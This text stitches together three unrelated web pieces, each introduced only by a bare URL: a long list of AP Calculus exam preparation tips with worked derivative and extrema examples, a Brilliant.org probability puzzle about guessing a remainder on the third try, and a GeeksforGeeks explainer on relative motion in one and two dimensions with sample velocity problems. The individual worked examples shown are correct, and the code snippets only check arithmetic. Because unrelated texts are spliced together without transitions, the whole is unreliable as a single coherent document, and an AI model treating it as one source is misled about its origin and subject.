1. Understand what the question is asking: Make sure that you read the question carefully and understand what they are asking for. Usually this is easier with mathematics type exams since math is more symbolic in nature. So it should be quite easy and apparent when you are trying to understand an AP Calculus question.
For example: What is the value of $f^{'}\left(x\right)$ for the function $f\left( x \right) =3{x}^{3}+{x}^{2}+4$ at the point $x =4$?
In this example they are asking for the numerical value of the first derivative of the function at a particular point. So you will first need to find the first derivative of the function $f\left(x\right)=3{x}^{3}+{x}^{2}+4$, which is $f^{'}\left(x\right)=9{x}^{2}+2x$, and then plug the value $4$ for $x$ into the first derivative equation. Therefore, the answer is $f^{'}\left(4\right)=152$.
2. The Process of Elimination Technique (POE): If you really know your stuff you will normally not need to use this technique. However, there are almost always a few problems that you may be having trouble with on the exam, and this technique can come in very handy there. If some answers are obviously wrong, mark them as eliminated. Since there are five possible answers to each multiple-choice question, a blind guess is right 20% of the time; eliminating one answer raises your odds to 25%, and eliminating two raises them to about 33%. Not too shabby! Again, use this technique only if necessary. Otherwise, solve the problem and choose the correct answer.
3. Use an AP Calculus study guide or textbook to prepare: Using a study guide or a good textbook can be a tremendous help in getting a high score on your AP Calculus exam. The reason for this is that many of the types of problems that occur on the AP Calculus exam come from these study guides. You can find many of them on the internet by doing a simple internet search. The most important thing to remember is that the more problems you do at home or with a study partner, the better your chances will be for getting a high score. Using this tip will also give you exposure to the types of problems that will appear on the AP Calculus exam. This leads us to the next tip.
4. Know the different types of calculus problems: There are many different types of Calculus problems. One of the most common is the min/max problem. These problems require you to find the derivative of a specified function and set it equal to zero. You would then solve the resulting equation (the derivative) to find its roots and apply these roots to the original function to determine the min or max. Another common type of problem is that of finding limits of functions. Starting in 2016, the Calculus AP exam will contain problems relating to L’Hôpital’s rule. This is a great way of determining the limit of a function divided by another function. You can visit this page to understand how to use L’Hôpital’s rule when finding the limit of a quotient of two functions. The other types of problems found on the AP exam are the following: continuity of functions, asymptotic functions, antidifferentiation and the Fundamental Theorem of Calculus.
5. Understand and master the Chain Rule: It is very important that you know how to use the Chain Rule. This rule is used for the computation of derivatives of the composition of two or more functions. See this page for more information on how to use the Chain Rule. Knowing this rule will allow you to easily calculate the derivative of a composite expression containing two or more functions and their respective variables.
6. Identify your weaknesses: If there are certain types of AP Calculus problems you generally have issues with, practice doing more of those before taking the AP Calculus exam. Focus on the underlying concept of these (or any other) problems. Mastering and understanding the underlying and fundamental concepts of AP Calculus will greatly help you improve your score.
7. Review AP Calculus practice multiple choice questions online: One of the best ways to prepare for the multiple choice portion of the AP Calculus exam is to use online practice sites. These sites either have actual past AP Calculus multiple choice questions or they are modeled to be strikingly similar to past exams. Here is one such site with the 2006 AP Calculus practice exams along with the key to the answers. Going through each and every problem on this one website is the equivalent of taking the AP Calculus test a total of five times! You get a real flavor of what to expect on the actual AP Calculus exam if you go through these problems one by one. In this manner, you will also know what types of problems to expect when you take your own exam.
8. Study the multiple-choice problems in the 2016 College Board AP Calculus course description: The course description manual published by College Board AP covers both AP Calculus AB and AP Calculus BC exams. It contains just about all of what you’ll need in order to get the best possible idea of taking the actual exam, the philosophy and principles behind it and a number of multiple choice and FRQ examples. We strongly recommend that you read and understand the entire document and then do the sample questions. Better still, we also recommend that you time yourself. Part A of the multiple-choice section contains 30 questions (60 minutes) and Part B contains 15 questions (45 minutes).
## AP Calculus Free Response Question Tips
The following tips are specifically designed to help you master the FRQ section of the exam. An FRQ is like a series of multiple-choice questions with the caveat that the FRQ is fashioned in the form of a chain of reasoning exercise. In essence, the FRQ is digging deeper in attempting to assess your more global understanding of Calculus.
1. Practice released FRQs: Visit AP Central here for examples of the AP Calculus Free Response Questions from 1999-2016. These will give you the best idea of what to expect on your exam. If you have trouble or need more advice, review these walkthroughs and tips from Stacey Roshan.
2. Underline key equations: FRQs for the AP Calculus exam are essentially word problems that come in multiple parts, usually 3–5 parts per FRQ. The first thing you should do is underline any key equations that are given. FRQs are designed to test your capacity for an “extended chain of reasoning”.
3. Show all your work: Since partial credit is given for FRQ’s it is especially important to show all of your work. For example, you may be given a function $f\left(x\right)$ and will need its derivative $f^{'}\left(x\right)$. Make sure that you actually write down the first derivative $f^{'}\left(x\right)$ and underline or box it in since it will be an important equation you will need for the other parts of the problem. Here is an actual example from the College Board website. Your work should be clearly written in the space provided and your answers also should be provided in the proper space. Sometimes you will be asked to justify your answer. In this case briefly describe how you arrived at the answer. Indicate what concepts or equations you used to get to the correct answer. We recommend placing the words “Final Answer” or the letters “FA” right next to the boxed in final answers. This will make it very clear to the graders of your exam that this is your final answer.
4. Budget your time: You will have a total of six FRQs. Part A will contain two FRQs and is 30 minutes long (calculator permitted). Part B will contain four FRQs (calculator not permitted) and is one hour long. Important note! If you still have time when you finish Part B, you are allowed to go back and finish Part A if you need to. Try to spend no more than 10 minutes per FRQ. This will allow you some time to re-visit a particular question.
5. Read the data and question parts slowly and carefully: Each AP Calculus Free Response Question has essentially two parts. The first part is the data or information needed to solve the individual problems. The second part is the individual questions. You will need to understand both parts in order to correctly answer and provide solutions to all of the questions.
6. Be specific and brief in your justification answers: If you are asked to justify your answer, don’t write a book about it! Be brief and to the point. Make sure you include all pertinent aspects of how you arrived at the solution. For example, if you are asked to provide justification on how you determined that a certain polynomial function has a max or a min at a certain point you must show the individual steps you took in order to arrive at the solution. To do this, make a table showing the original function, the function’s first derivative and its roots and all of the critical points. Then finally show how you determined that the point was a min or max. See the example below:
Find the absolute maxima and minima of the function:
$f\left(x\right) ={x}^{3}-6{x}^{2}+9x+2,\quad 0\le x\le 4$ .
Take the first derivative:
$f^{'}\left(x\right) =3{x}^{2}-12x+9$ .
Find the roots which are:
$x = 1$ and $x = 3$.
These are the only critical points of $f$. We consider the following table of the endpoints and the critical points of $f$:
| $x$ | $f(x)$ |
| --- | --- |
| $0$ | $2$ |
| $4$ | $6$ |
| $1$ | $6$ |
| $3$ | $2$ |

The absolute maximum is $6$, occurring at both $x = 1$ and $x = 4$; the absolute minimum is $2$, occurring at both $x = 0$ and $x = 3$.
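If you want to double-check a table like this, a computer algebra system can rebuild it mechanically. A minimal sketch using the sympy library (an assumption on my part; any CAS works), mirroring the worked example above:

```python
import sympy as sp

x = sp.symbols('x')
f = x**3 - 6*x**2 + 9*x + 2
crit = sp.solve(sp.diff(f, x), x)            # critical points: [1, 3]
candidates = [0, 4] + crit                   # endpoints plus critical points
values = {c: f.subs(x, c) for c in candidates}
print(values)                                # {0: 2, 4: 6, 1: 6, 3: 2}
print(max(values.values()), min(values.values()))   # 6 2
```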
7. Pay attention to details: Don’t forget to give units if required. For example, if they ask you how many cubic feet of water are flowing through a pipe at a certain time, make sure that your final answer includes both the number and the units; in this case the units would be ft³. Another example is to include the constant C whenever you integrate a given function; leaving the C out will cost you points. Also, and this is especially important, make sure that your standard Calculus notations are correct and complete. For example, $\frac{d^2}{dx^2}f\left(x\right) = \frac{d}{dx}f'\left(x\right) = f''\left(x\right)$
8. Rounding of numerical answers: Make sure that any numerical answers are given to the nearest thousandth (3 places after the decimal point). Also, store any interim values in your calculator and use those numbers to calculate the final answer. You will lose points if your answers are not properly rounded.
9. Be neat when working on FRQs: Try to be as neat as possible when showing your work or answers on Free Response Questions. This is good for two important reasons. Firstly, if the graders cannot read your work they will not give you partial credit. Secondly, neat work makes it easier to catch a mistake in an early part of a question, say section (a), before it propagates into your answers for sections (b), (c) and (d), since the FRQs are designed to challenge your chain of reasoning.
10. Make up your own problems and then solve them: This may sound silly but it will actually test your true aptitude in Calculus. Start with making up your own polynomial equation and then find its first derivative. Then, in order to prove to yourself that you understand the Fundamental Theorem of Calculus, take the integral of the derivative you just found. You should, of course, come up with the original polynomial. Take this a step further and make the original function more complex. Take a polynomial and multiply or divide it by a trigonometric function. Write it down and try taking its derivative. Once you have gotten an answer, plug in some numerical values and then check it with your calculator. Just think of how many possibilities you could come up with. Stick with reasonable expressions and don’t overdo it. Write all of your work down on a piece of paper and keep it as your own personal study guide.
11. Never forget +C. When integrating a function, remember that you need to account for an arbitrary constant C. It may seem frivolous after you’ve done more complex calculations, but it’s not. Check through your answers at the end of the section to make sure you have included a constant when necessary. I often forgot this during the school year, so I made sure to commit it to memory while studying. When the test arrived, I was incredibly glad I had. C is a crucial part of the equation and you will be marked down if you forget it!
12. Don’t doodle! Many students who feel discouraged think it is funny to draw instead of answering the question; try not to do this. Doodling is the equivalent of leaving a multiple choice question blank: you will get zero points no matter what. Even if you’re stumped, try rewriting what you know and brainstorming some ways you might be able to solve it. You might get a couple of points anyway. Better yet, you might have an insight that helps you work through the problem.
13. Memorize the key derivatives and integrals of common trigonometric and other functions: This tip is very important because it will save you time by not having to explicitly derive already known expressions. They will almost certainly appear on the AP Calculus exam, so it is best that you know them by heart, much like you learned multiplication tables in grade school using flash cards. You can also memorize these key derivatives and integrals by simply writing them down in your personal notes. Whenever you study for the AP Calculus exam, take the time to memorize them, but more importantly, to understand them.
## Tips by AP Calculus Teachers
The following are a collection of tips specifically designed to help you optimize your performance on the AP Calculus exam. Most of the tips are from the writer of this article. I first learned Calculus at the age of 16 and was self-taught in the beginning. I also searched the internet extensively for more authoritative sources on the AP examination process, such as College Board AP Central.
1. Relax and Enjoy! I know it sounds somewhat counterintuitive to enjoy taking a test but it’s actually very possible to do. Remember, you are taking this exam because you are smart and because you may even enjoy Calculus. Think of taking the exam as an opportunity and not a chore or commitment. You should put yourself in the frame of mind that it is an honor for you to be taking the exam in the first place and you now have that great opportunity to demonstrate your advanced skills. Stay positive in your thinking and simply focus on each individual question as if it were like any other test you have taken in school.
2. Prepare yourself both mentally and physically: A few days before you actually take the exam, try not to think of it constantly. Doing so will only increase your anxiety level. Make sure that you relax your mind and get a good night’s sleep the night before the exam. Remember that taking the exam is an opportunity and not a necessity. While taking the exam keep this theme in mind and focus only on getting the correct answers. That should be your only goal.
3. Do as many problems as possible beforehand: Six to eight weeks before the exam start your preparation by doing a few Calculus problems each day. Make a habit of it. It will only take an hour a day and you will be ready and ultimately rewarded with a high score on the AP exam. You must do your due diligence and get in the groove of doing the problems each day during this time period. Don’t worry, be patient, practice daily and you’ll be well on your way to success. The score of 4 or 5 on the Calculus AP exam will happen by itself if you take this advice and persevere.
4. Be extremely confident in yourself: In order to get a good grade on any important standardized exam, you need to be extremely confident in yourself. Think positively by saying to yourself, “I know I can get a 4 or 5 on this AP Calculus test because I have prepared so well and for so long to get this far”. Also, say to yourself, “I’ve done so well on all the other exams I’ve taken so why not just treat this exam like those?” Speak with your friends and tell them how much you are looking forward to taking the exam. Their responses will not only reinforce your confidence levels but also will make you feel better about taking the exam with the expectation of achieving a 4 or 5.
5. Focus on learning and understanding fundamental concepts: This is the most important tip I give to all my students. Calculus is all about solid, valid and proven concepts. Know that the derivative of a function at a certain point is the slope of the line that is tangent to the curve at that point. Know that integration is the inverse of differentiation and vice versa. Also know that the net area bounded by the curve and the x-axis between any two points is equal to the definite integral of the function between those two points. See Wikipedia.
6. Review past math concepts: It is also a great idea to make sure that you are still fluent with the other math courses and concepts you have learned in the past. Surely you will want to be familiar with advanced algebra and graphing polynomials. You will also want to make sure that your trigonometry is up to par. Many Calculus problems will use trig functions so it would be best for you to review trigonometric identities and common trigonometric formulas. Thanks for the tip from the folks at the College Board.
7. Study with friends or other students: If any of your fellow friends or students will also be taking the AP Calculus exam, it would be a great idea for you to get together with them every so often and do some problems together. Remember the old saying that “Two heads are better than one”. Studying with other people with the same goals is great because it adds an element of personality to your academic understanding of a particular subject matter. Most serious students do this during High School or College and it also helps take the stress out of the anticipation of taking such a high-level exam such as AP Calculus. Thanks for the tip from the folks at the College Board.
8. Use outside resources: You should always use outside sources for preparing for the AP Calculus exam. Relying on only one textbook would give you a narrower understanding of the types of problems that might occur on the AP test. Remember that the AP exam is prepared by a committee that likely uses multiple resources to create the problems. You should also diversify your portfolio, so to speak, and use the internet or other good textbooks on Calculus. There are scores of websites devoted to sample Calculus problems. I would visit as many as possible without over doing it of course. Thanks for the tip from the folks at the College Board.
9. Ask for help: If you are having difficulty with certain types of problems then it would be a good idea to seek help. You might want to schedule some time with your teacher at school or perhaps look into hiring a good Calculus tutor. Thanks for the tip from the folks at the College Board.
10. Help other students: Besides just getting together with other students or friends for a Calculus studying session, it would be good for you to help other students that may be having problems with understanding Calculus. If you are very comfortable with having an above average understanding and knowledge of Calculus, it would be great for you to help someone else out. This would be a win-win situation for both of you since teaching a subject matter always reinforces the concepts with yourself. You will gain additional confidence and understanding of the basic principles of Calculus by teaching someone else. Thanks for the tip from the folks at the College Board.
11. Learn from students that have taken the test before: You may already know some people that have taken the AP Calculus exam before. If so, speak with them about their experience in taking the exam. They may have some tips for you as well. Ask them questions like, “What types of problems were on the test?” or “Did you have enough time to finish all of the problems?”. You may also ask them if they thought the test was easy or difficult. Try to get as much information from them as you can. It certainly can’t hurt. Thanks for the tip from the folks at the College Board.
12. Don’t procrastinate: Some students are better than others at not procrastinating. Make sure that you are serious about preparing for the exam way in advance and start doing problems on a daily or otherwise frequent basis. It is important that you stick to a plan and execute it properly. Don’t say to yourself, “Oh, I already know this stuff so I will put it off until the week before the exam”. If you do that, it will definitely ensure that you will not be fully prepared for the exam. Always remember that practice makes perfect and just make sure that you do a lot of practicing. Again, like I said before, the more you practice, the better are your chances of getting a 4 or 5 on the AP Calculus exam. Good luck!
13. Answer all questions: When you are finished with the exam, make sure that all questions have an answer. If you leave a question blank you will not get any points for that question. This could make the difference between a 4 or a 5 score if you leave too many questions unanswered. Thanks for the tip from the folks at the College Board.
14. Wear a watch: Although there may be a clock on the wall in the room, there is no guarantee. Even if they do have a clock in the room it would be a lot better if you were to simply look down at your wrist rather than looking up to the wall clock all the time. Thanks for the tip from the folks at the College Board.
15. If you feel overwhelmed or your hand cramps, take a short break. Taking thirty seconds to shake out your wrist after all that writing and look up from your paper will not be harmful. It’s a timed test, but it’s not a time trial. Taking short breaks when you feel confused allows you to clear your head and relax.
16. Remember, you don’t need to score 100% to pass. The AP Calculus test is supposed to be difficult. While you might have done very well on unit tests in your Calculus class, most people do not score nearly as well on the AP test. This is how it is designed. To receive a 5 in recent years, examinees have only needed to answer 63% of material correctly. This is not a test to ensure you know everything, but to measure what you do.
17. When it’s done, relax and celebrate! Once you have turned in your exam, there is nothing more you can do for a couple of months. Do not worry too much about your results until they come out. You have worked hard all year to earn college credit, and now your studying and practice has paid off!
18. Work AP problems ALL YEAR LONG! Don’t wait until the end of the year for the review. We review by chapter, the day before or after each test. Thanks for the tip from Ms. Gisella C. from Boca Raton Community High.
19. When things get difficult, focus on what you DO know as a starting point–not what you don’t. Pull together the ideas of what you DO know and good things will happen. Thanks for the tip from Aaron P. from Crystal Lake Central High.
20. Be sure to label all work correctly. For instance, if you are taking the derivative, be sure to label it f prime (x). When setting up an integral, use the integral symbol, etc. As a reader, it is amazing how many students work a problem with no labeling, or worse, mix up f and f prime. Thanks for the tip from Mr. Waddell.
21. Review all formulas the night before the exam and then go to sleep. No need to try to cram…you just can’t for this test. It’s what I always tell them. Well, that and to learn every little detail about every little Calculus theorem there is. Thanks for the tip from Pamela L. from Ralph L. Fike High.
22. In doing derivatives, I always stress the difference between $y = x^n$, $y = a^x$, $y = a^n$, and $y = x^x$. All of them look similar, but different rules apply: Power Rule, Exponential Rule, Constant Rule, and Logarithmic Differentiation. I usually do this by presenting 4 specific problems on the board, such as the ones with n = e, a = pi. I ask them which rules apply. They always try to use the power rule on all 4. However, with practice at the board, they get the difference. Thanks for the tip from Ron T.
23. If a student boxed in an answer on the FRQ’s, that was the only answer we could consider. Too many students had the correct answer elsewhere and I could read that answer, unless they had a boxed in answer. Thanks for the tip from Laura S. from Chatham High.
24. Learn the language and vocabulary, because half of the battle is knowing what a question is asking and/or telling you! Give yourself the benefit of analyzing the information presented in a question, because then you can execute on the knowledge and skills that you have practiced! Thanks for the tip from Brittany A. at YesPrep Public Schools.
25. The best thing I can think is for students to practice “AP level” problems as much as possible. Students should find past AP tests, the AP course description or review books and do as many problems as they can. Thanks for the tip from Richard S.
26. There may be stuff on the test that you do not know. That is okay. Just don’t panic and do well on the stuff you do know how to do. Thanks for the tip from Ned E. from Lebanon High.
27. Relax and don’t be afraid of making mistakes…you are sharper than you think. Thanks for the tip from Ms. L.
28. Have the unit circle memorized so that you can fill in a blank one in 5 minutes or less. It will save you precious time on the AP exam. Thanks for the tip from Liesa K. at Art College Prep, Jill P., and Michelle J.
29. One tip I give them to be successful on the AP exam is to mentally get after it. They are a little confused at what I mean by that at first, so I relate it to sports. If you are in a wrestling match, you ‘get after it’ physically. On the exam you get after it mentally. There are no times where you lose focus. Your mind is working its tail off. If you get tired or start to lose focus, you have to pep yourself up and get after it even harder. When the test is over, you will feel drained but proud of your efforts. Thanks for the tip from Brad S.
30. When you have worked the problem, do not write the answer until you go back and read the question. This applies to both parts of the test. Thanks for the tip from Mr. B.
31. The best tip I could give for the multiple choice sections is called “Triage.” On the first pass through the multiple choice problems, do only those you immediately and absolutely know how to do. Circle the ones that you cannot do without some effort. Make a second pass through, this time skipping those you feel you have no idea how to do. Go through the problems one last time and attempt those problems you believe to be most difficult. This makes the best use of your time and keeps you from expending mental energy early in the test on problems that are difficult. Thanks for the tip from Mr. G.
32. Do not simplify a numerical answer! If you get 1(1) + 2(3) + 5cos 45, stop! You are finished. I took away over 100 points when I graded the exam because students told me 1(1) = 2. Thanks for the tip from KC H. at Freedom Area High.
33. Don’t let AP readers guess at what you mean. Write the responses to your Free Response questions completely, leaving nothing to the readers imagination. Thanks for the tip from Ryan H. at Southern Lehigh High.
34. Don’t simplify your answers for the FRQs. Thanks for the tip from David O. at St. Johns Country Day School.
35. Questions have to do with one of the following areas: limits, derivatives, or integrals (definite or indefinite). If you get stuck on a problem, just ask yourself which of these the question is asking you to find. Thanks for the tip from Dan M. at Broad Run High.
36. AP stands for Always Practicing. You cannot cram prior to the exam and expect to be successful on any AP test. You must put the time and work in all year long. This includes weekends, holidays, and even snow days. If you have consistently done this, your scores will reflect your efforts. Thanks for the tip from Dan M. at Broad Run High.
37. The value of a limit of a function as x approaches “a” is NEVER the value of the y coordinate of an isolated “dot”. Thanks for the tip from James M.
38. EVERY point on the free response is its own little test. Write down all that you know and don’t get freaked out about stuff in an earlier part of a question you may NOT have known. STAY IN THE GAME! Thanks for the tip from Bo G.
39. THINK GRAPHICALLY. A picture IS worth a thousand words, and your ability to picture what is happening in the context of the problem will help you understand if the derivative should be negative or positive, if the value should be big or small, if the second derivative (acceleration in many cases) is positive or negative, if your integral value should be positive or negative, etc. To reason with a visual supports your algebra in many ways. Thanks for the tip from Chris L.
40. Sit on your ego! Know that you will be challenged and that it is not a reflection on you! Thanks for the tip from Damien J.
41. The more you practice a variety of problems from different resources the better you begin to recognize and understand types of problems. Thanks for the tip from Kristy H.
42. Bring extra batteries for your calculator! Thanks for the tip from David P. at Torrey Pines High.
43. You must know the why and how, not just the what. Thanks for the tip from John S.
44. Don’t forget your calculator on exam day and be sure to put fresh batteries in it. Thanks for the tip from Dawn D. at FCHS.
45. Make sure your calculator is in radians (check the settings in general). Thanks for the tip from Dawn D. at FCHS.
46. Use your calculator when there are shortcuts to solving a problem rather than performing the calculus by hand. Thanks for the tip from Dawn D. at FCHS.
47. Answer only the question asked, don’t waste time doing something that isn’t needed or required to a problem. Thanks for the tip from Dawn D. at FCHS.
48. If a graph is given, be sure to identify which function it represents: is it the function or a derivative? Thanks for the tip from Dawn D. at FCHS.
49. Don’t oversimplify. The test doesn’t require it, and oversimplifying can use valuable time! Thanks for the tip from Misty P. at Virtual Virginia.
50. I would tell students to know their major theorems, both hypothesis and conclusion, cold. To me these are IVT, EVT, Rolle’s, MVT (derivatives), FTC I (including its use for Net Change on a rate), FTC II, and MVT (integrals). After that, practice justifying numerical and graphical problems on previous FRQs using the information given (Ex: Given a graph of f(x), do not simply say f'(x) is positive, say f'(x) is positive as the given graph, f(x), is increasing, thereby connecting your justification to the information given). Finish by checking your work with the sample 9/9 FRQ student response provided by the College Board. Thanks for the tip from Shaun B. at James Clemens High.
51. Use 3 decimal places. Thanks for the tip from Keith L. at SHHS.
52. Make sure students know that a critical number must be in the domain of the function. So in f(x) = (x + 5)/(x – 3), 3 cannot be a critical number. Thanks for the tip from Jane W.
53. On application questions with lots of information, highlight the units on the given functions (equation, graph, or table) in the problem and ask yourself what needs to be done (integrate or differentiate) in order to arrive at the correct units in your answer. Thanks for the tip from Joseph S.
54. Learn to do mental math. You save time on the Multiple Choice, no calculator part. Thanks for the tip from Leena G.
55. My tip is to never leave a free response question blank and if you are unsure what to do, set the given equation equal to zero and solve it and set the derivative of the given equation equal to zero and solve it. Thanks for the tip from Craig G.
56. Do Saturday work sessions by topic and give mock exams. Thanks for the tip from Valerie P.
57. On free response questions especially, practice understanding in words what you are doing mathematically. Like knowing by the words if they want a average rate of change or the average of the integral. Knowing how those are asked and what the answers mean, make it easier not only to answer the question but to justify the answer as well. Thanks for the tip from Natalie B. from Memorial Early College High.
58. Time can be your enemy. When taking practice exams, set your timer to give yourself 5 fewer minutes than you would when taking the actual exam. You’ll get used to working at a quicker pace and you’ll have extra time to check your work before time is called. Thanks for the tip from Mary B.
59. Realize this is not a UIL competition test. They are looking for a reason to give you credit for Calculus – not trying to make a test no one can make a 100 on. Practice being thorough in your answers so they can see you understand the concept. Thanks for the tip from Michael B.
60. Starting In January do one free response question a night. This attachment has the problems by topic, year, and number. Thanks for the tip from Eric H.
61. Continue to ask yourself WHY? as you progress through the topics. If you are doing that, and able to answer that, then you will continue to understand the concepts deeply, and the unique problems from the AP will be easily tackled. Thanks for the tip from Eric S.
62. Answer every part of a FRQ. Label each part a), b), c), etc. If there are multiple answers, roots, solutions, points to a single question, make sure to sum up your answers in one Box. Thanks for the tip from Mary S. from Grafton High.
63. The best tip I have for my students is to keep up with the current homework, homework is where most of your learning takes place. If you have questions make sure to ask them. Work with a buddy or buddies if you can and discuss your ideas. Catching up is very difficult. Thanks for the tip from Carolanne F.
64. Read the question carefully and answer it completely. – Many FR questions require the student to complete multiple tasks. Many students lose points because they do not answer the questions appropriately. Thanks for the tip from Jessica S. from Cypress Bay High.
65. Know the big concepts, but pay attention to the details. Show all work and do not skip steps. Thanks for the tip from Beth P. from Martin Luther King, Jr. Magnet School.
66. Here’s a tip I use to try to get kids to take a breath before starting a free response question: Basically, Calculus is derivatives and integrals, so ask yourself before doing any work, “Is this a derivative or an integral question?” Then, at least, they have somewhere to start. Thanks for the tip from Steve S. from Kents High.
67. The mean value theorem and its converse must be understood at all levels and one must be able to provide a simplistic physics example to explain it. Thanks for the tip from Jonathan H.
68. Limits must be understood to bind the whole of calculus together and must not be treated as the red-headed stepchild, and this includes graphing them by hand using precalculus and algebra 2 rules and not being reliant on a calculator. Thanks for the tip from Jonathan H.
69. There are 3 phases of calculus: position, velocity, and acceleration. You must know which phase the problem is in currently and which phase you need to transform it to. This will help you decide if you are going to integrate or differentiate. Thanks for the tip from Rachael A.
70. Understanding graphs: keep in mind that a function can decrease while its derivative increases. Although tangent lines are getting less steep, their slopes are becoming less negative. Thanks for the tip from Mr. S.
71. Practice, practice, practice, and more practice. There are so many non-secure, practice multiple-choice and free-response questions available that there is no reason not to take full advantage of them in preparation for the exam. Exposure to the question formats, common notation/terminology, etc. is key to applying content knowledge for applicable scenarios and, ultimately, being successful on the actual exam. Thanks for the tip from Dominic B.
72. Even if you have the correct answer, linkage errors and presentation errors can make students lose points in the grading process. Go back and check for these before time is up. Linkage error example: 10 * 5 = 50 / 2 = 25 is a linkage error because 10 * 5 does not equal 50 / 2. You must start a new line rather than link them together: so 10 * 5 = 50; 50 / 2 = 25. Presentation error example: when doing limit problems, not putting “the limit as h approaches 0” in front of each expression along the way to the answer results in a presentation error. Thanks for the tip from Doreen V.
Are you a teacher or student? Do you have an awesome tip? Let us know!
## Frequently Tested Concepts for the AP Calculus Exam
Differential Calculus
Properties of limits, Properties of derivatives, Domain and range, One-sided limits, Limits at infinity, Continuity, 3 Types of Discontinuities, Product rule, Quotient rule, Power rule, Chain rule, Even functions, Odd functions, Periodic functions, Trig derivatives and inverse trig derivatives, Implicit differentiation, Higher order derivatives, Mean Value Theorem, L’Hopital’s Rule, Tangent lines, Extreme Value Theorem, Newton’s method of approximation.
Integral Calculus
Indefinite integrals, U-Substitution, Integration by parts, Exponential growth and decay, Definite integrals, Riemann sums, Trapezoidal method, Fundamental Theorem of Calculus #1, Fundamental Theorem of Calculus #2, Average Value, Disk method, Washer method, Shell method.
This Ultimate List of AP Calculus Tips was written for the express purpose of giving the AP Calculus student a strong competitive advantage when taking the exam. The academic world is especially competitive these days and it is critical that even the best of students read and understand these tips. Make sure to bookmark this page so that you can refer to it throughout the school year as you navigate your way through AP Calculus AB/BC. Best of luck!
https://brilliant.org/problems/inspired-by-nihar-and-sandeep/
# Inspired by Nihar and Sandeep
When a non-negative integer $$x$$ is divided by 5, we get a remainder $$y$$ such that the number $$x$$ can be represented as $$x = q \times 5 + y$$. For an explicit example, if $$x = 41$$, then we have $$x = 8 \times 5 + 1$$, and the remainder here is 1.
If I give you three chances to enter the integer $$y$$, what is the probability that you will get the question right on the third attempt?
Clarification:
• You will have to come up with a valid option (a possible remainder which we get after division by 5) each time you enter an integer.
• The remainder is defined to be bounded in the interval $$[0, 5)$$, so there are exactly five possible values.
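A quick way to sanity-check the answer is a Monte Carlo simulation. The sketch below is illustrative only, and it assumes the strategy implied by the clarification: you guess uniformly at random among the five possible remainders, never repeating an earlier guess.

import random

def third_attempt_success(trials=100_000):
    # Estimate P(first two guesses wrong, third guess right)
    hits = 0
    for _ in range(trials):
        y = random.randrange(5)               # the true remainder, 0..4
        guesses = random.sample(range(5), 3)  # three distinct guesses
        if guesses[0] != y and guesses[1] != y and guesses[2] == y:
            hits += 1
    return hits / trials

print(third_attempt_success())  # about 0.2, i.e. (4/5) * (3/4) * (1/3) = 1/5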
https://www.geeksforgeeks.org/relative-motion-in-two-dimension/?ref=lbp
# Relative Motion in Two Dimensions
The motion of bodies is not absolute or isolated; it is always described with respect to some reference. For example, the speed of a moving vehicle is measured with respect to the ground, and position is measured with respect to a reference point called the origin. A train may have a velocity of 100 Km/h with respect to the ground, but if another train moves alongside it at 150 Km/h, the velocity of the first train with respect to a person sitting on the second train will not be 100 Km/h. It is therefore essential to study the relative motion of objects. Let's explore this concept in detail.
### Reference Frames
In physics, a frame of reference is an abstract coordinate system together with a set of physical reference points that uniquely fix it and standardize measurements made with respect to that frame. For example, the velocity of a cart with respect to a boy standing on the ground is non-zero, while the velocity of the same cart with respect to a person sitting inside the cart is zero.
### Relative Motion in One Dimension
Relative motion in one dimension is the building block for calculations involving relative motion in more than one dimension: vectors can be decomposed into their components, and this rule can then be used to calculate the relative velocity in each direction. As an example, consider a person sitting on a train moving at 10 m/s towards the east. Assume that east is chosen as the positive direction and the earth as the reference frame.
The velocity of the train with respect to the ground frame,
vTE = 10 m/s
Now suppose the person on the train gets up and starts walking at 2 m/s in the direction opposite to the train's motion. This velocity is measured with respect to the train's frame, so the velocity of the person is,
vPT = -2 m/s
These two vectors can be added to find the velocity of the person with respect to the earth. This is called relative velocity.
vPE = vPT + vTE
### Relative Motion in Two Dimensions
These concepts can be extended to two-dimensional spaces also. Given in the figure below, consider a particle P and reference frames S and S’. The position of the frame S’ as measured in S is rS’S, the position of the particle P as measured with respect to the frame S’ is given by rPS’ and the position of the particle P with respect to the frame of reference S is given by rPS,
Notice from the figure that,
rPS = rPS’ + rS’S
These vectors also give us the formula for relative velocities. Differentiating the above equation,
vPS = vPS' + vS'S
Intuitively speaking, the velocity of the particle with respect to S is equal to the velocity of the particle with respect to S' plus the velocity of S' with respect to S.
Differentiating this equation again, the equation for the acceleration is given by,
aPS = aPS' + aS'S
The acceleration of the particle with respect to S is equal to the acceleration of the particle with respect to S' plus the acceleration of S' with respect to S.
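As a quick numerical check of these relations, here is a minimal Python sketch (the velocity components are made-up assumptions; the variable names mirror the subscripts in the text):

import numpy as np

v_PSp = np.array([2.0, 1.0])   # velocity of particle P w.r.t. frame S'
v_SpS = np.array([3.0, -4.0])  # velocity of frame S' w.r.t. frame S

v_PS = v_PSp + v_SpS           # vPS = vPS' + vS'S
print(v_PS)                    # [ 5. -3.]
print(np.linalg.norm(v_PS))    # speed of P as seen from S, about 5.83

The same component-wise addition is what the sample problems below carry out with the unit vectors i and j.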
### Sample Problems
Question 1: A train is moving at a speed of 100 Km/h. The person sitting inside the train starts moving in the direction of the train at a speed of 10Km/h. Find the velocity of the person with respect to the ground.
Given:
velocity of the train with respect to the ground, vTG = 100Km/h
velocity of the person with respect to the train, vPT = 10Km/h
velocity of the person with respect to the ground vPG,
The equation mentioned above states,
vPG = vPT + vTG
plugging the values into the above equation,
⇒ vPG = 100 + 10
⇒ vPG = 110 Km/h
Question 2: A train is moving at a speed of 100 Km/h. The person sitting inside the train starts moving in the opposite direction of the train at a speed of 10Km/h. Find the velocity of the person with respect to the ground.
Given:
velocity of the train with respect to the ground, vTG = 100Km/h
velocity of the person with respect to the train, vPT = -10Km/h
velocity of the person with respect to the ground vPG,
The equation mentioned above states,
vPG = vPT + vTG
plugging the values into the above equation,
⇒ vPG = 100 – 10
⇒ vPG = 90 Km/h
Question 3: A vehicle is moving at a speed of 3i + 4j m/s. The person inside the car sees a bird flying at a velocity of 2i + 2j m/s relative to the vehicle. Find the speed of the bird with respect to the ground.
Given:
velocity of the vehicle with respect to the ground, vVG = 3i + 4j
velocity of the bird with respect to the vehicle, vBV = 2i + 2j
velocity of the bird with respect to the ground, vBG,
The equation mentioned above states,
vBG = vBV + vVG
plugging the values into the above equation,
⇒ vBG = 2i + 2j + 3i + 4j
⇒ vBG = 5i + 6j
⇒ |vBG| = √61 m/s
